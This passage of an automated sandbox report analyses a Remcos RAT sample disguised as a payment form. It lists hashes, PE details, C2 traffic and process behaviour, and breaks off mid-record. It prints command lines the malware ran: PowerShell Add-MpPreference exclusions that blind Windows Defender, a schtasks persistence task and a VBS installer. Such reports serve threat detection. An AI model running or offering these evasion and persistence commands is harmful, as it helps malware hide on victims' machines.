                                            SHA-256:62967F2891D193BC27221BEBE231C99252EA3C011C8EB97A839F5AD2DE04228E
                                            SHA-512:F2B9E8B4B20BC553E32BBA96C5E1AA3B614F478FEA308BD3CE8FE0045C7B2A79A5169F4EEAD2E6DE128FC2BB282852E681360FA66FE3496367C95B1463460753
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                            C:\Users\user\AppData\Roaming\iKgKaogJ.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1243656
                                            Entropy (8bit):7.6645164763774805
                                            Encrypted:false
                                            SSDEEP:24576:RYdgfvzAKzxWCC9vSA6GRdsttHVqowvVpBdlvlOUa:rzAcWFt96ydyQow5dldna
                                            MD5:FC5A80ADF45D78FFA834283D0A78F9F6
                                            SHA1:6865DEC6F71546EA01420295B7175038C3A81EC4
                                            SHA-256:E588A098E9CEB33F2616E11A3FAF28162E5F4B7F3800B22AB3023BC376AEB18C
                                            SHA-512:27636CD0D31E3B1FF384869F1F2BE6C23D7F02ECD70027C5D689DE0893835D070218596A941472481D637CC6253ED3F2405991A6AF4772596CC88F909A7DD7CB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 53%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>g..............0......(.......... ........@.. ....................... ............@.....................................O........%...............6........................................................... ............... ..H............text....... ...................... ..`.rsrc....%.......&..................@..@.reloc..............................@..B.......................H............3..........tJ.. n............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"

                                            C:\Users\user\AppData\Roaming\iKgKaogJ.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.6645164763774805
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Payment Transfer Request Form.bat.exe
                                            File size:1'243'656 bytes
                                            MD5:fc5a80adf45d78ffa834283d0a78f9f6
                                            SHA1:6865dec6f71546ea01420295b7175038c3a81ec4
                                            SHA256:e588a098e9ceb33f2616e11a3faf28162e5f4b7f3800b22ab3023bc376aeb18c
                                            SHA512:27636cd0d31e3b1ff384869f1f2be6c23d7f02ecd70027c5d689de0893835d070218596a941472481d637cc6253ed3f2405991a6af4772596cc88f909a7dd7cb
                                            SSDEEP:24576:RYdgfvzAKzxWCC9vSA6GRdsttHVqowvVpBdlvlOUa:rzAcWFt96ydyQow5dldna
                                            TLSH:6C45C020B6F8DE67E27AA1F3DAC4821197B6D141767BD3AA0CC564CE25D27321383D27
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0......(........... ........@.. ....................... ............@................................

                                            File Icon

                                            Icon Hash:130b253d1931012d

                                            Static PE Info

                                            General

                                            Entrypoint:0x52b8e6
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x673E8CDC [Thu Nov 21 01:29:00 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Authenticode Signature

                                            Signature Valid:false
                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                            Subject Chain
                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                            Version:3
                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                            Serial:7C1118CBBADC95DA3752C46E47A27438

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x12b8940x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x12c0000x2588.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x12c4000x3608
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1300000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x1298ec0x129a00f9074bdc3e4c609ac3e87b9b528786c4False0.7907211387022259data7.664561171360738IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x12c0000x25880x26009f23fd2b35dfeaffc23a0f595347c8f9False0.8753083881578947data7.577385188812171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x1300000xc0x2004fbb471a8ef5c6fdc104e1206fd81f16False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x12c1000x2016PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9504504504504504
                                            RT_GROUP_ICON0x12e1280x14data1.05
                                            RT_VERSION0x12e14c0x23cdata0.46853146853146854
                                            RT_MANIFEST0x12e3980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-24T08:23:49.109682+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949754212.162.149.2269285TCP
                                            2024-11-24T08:23:52.905180+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.949761178.237.33.5080TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 24, 2024 08:23:47.674302101 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:47.794027090 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:47.794109106 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:47.800215960 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:47.919892073 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:49.057621956 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:49.109682083 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:49.311713934 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:49.321471930 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:49.441055059 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:49.441118956 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:49.560684919 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:49.944257975 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:49.957482100 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:50.076893091 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:50.154537916 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:50.265939951 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:51.444372892 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:23:51.564573050 CET8049761178.237.33.50192.168.2.9
                                            Nov 24, 2024 08:23:51.570478916 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:23:51.614166021 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:23:51.733948946 CET8049761178.237.33.50192.168.2.9
                                            Nov 24, 2024 08:23:52.904948950 CET8049761178.237.33.50192.168.2.9
                                            Nov 24, 2024 08:23:52.905179977 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:23:52.915851116 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:23:53.035423994 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:23:53.904076099 CET8049761178.237.33.50192.168.2.9
                                            Nov 24, 2024 08:23:53.904167891 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:24:20.331466913 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:24:20.339855909 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:24:20.459458113 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:24:50.756966114 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:24:50.791527987 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:24:50.911089897 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:25:21.160660028 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:25:21.162004948 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:25:21.281574965 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:25:41.110745907 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:25:41.438613892 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:25:42.079134941 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:25:43.344917059 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:25:45.860702038 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:25:50.905225039 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:25:51.564254045 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:25:51.569518089 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:25:51.689155102 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:26:00.954273939 CET4976180192.168.2.9178.237.33.50
                                            Nov 24, 2024 08:26:21.984798908 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:26:21.986206055 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:26:22.105715990 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:26:52.407346964 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:26:52.412792921 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:26:52.532771111 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:27:22.828332901 CET928549754212.162.149.226192.168.2.9
                                            Nov 24, 2024 08:27:22.829530001 CET497549285192.168.2.9212.162.149.226
                                            Nov 24, 2024 08:27:22.949120998 CET928549754212.162.149.226192.168.2.9

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 24, 2024 08:23:51.151767969 CET4983653192.168.2.91.1.1.1
                                            Nov 24, 2024 08:23:51.289314985 CET53498361.1.1.1192.168.2.9
                                            Nov 24, 2024 08:24:03.673151970 CET5230953192.168.2.91.1.1.1
                                            Nov 24, 2024 08:24:03.811409950 CET53523091.1.1.1192.168.2.9

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 24, 2024 08:23:51.151767969 CET192.168.2.91.1.1.10xbc71Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                            Nov 24, 2024 08:24:03.673151970 CET192.168.2.91.1.1.10x598eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 24, 2024 08:23:28.394833088 CET1.1.1.1192.168.2.90xc243No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 24, 2024 08:23:28.394833088 CET1.1.1.1192.168.2.90xc243No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                            Nov 24, 2024 08:23:51.289314985 CET1.1.1.1192.168.2.90xbc71No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                            Nov 24, 2024 08:24:03.811409950 CET1.1.1.1192.168.2.90x598eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • geoplugin.net

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.949761178.237.33.50808156C:\ProgramData\AppUpdate\remcos.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 24, 2024 08:23:51.614166021 CET71OUTGET /json.gp HTTP/1.1
                                            Host: geoplugin.net
                                            Cache-Control: no-cache
                                            Nov 24, 2024 08:23:52.904948950 CET1170INHTTP/1.1 200 OK
                                            date: Sun, 24 Nov 2024 07:23:52 GMT
                                            server: Apache
                                            content-length: 962
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                            Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:02:23:29
                                            Start date:24/11/2024
                                            Path:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
                                            Imagebase:0x1b0000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:02:23:36
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:02:23:36
                                            Start date:24/11/2024
                                            Path:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
                                            Imagebase:0x8a0000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:02:23:37
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\wscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                                            Imagebase:0xca0000
                                            File size:147'456 bytes
                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:02:23:37
                                            Start date:24/11/2024
                                            Path:C:\Users\user\AppData\Roaming\iKgKaogJ.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\iKgKaogJ.exe
                                            Imagebase:0xb90000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 53%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:02:23:39
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
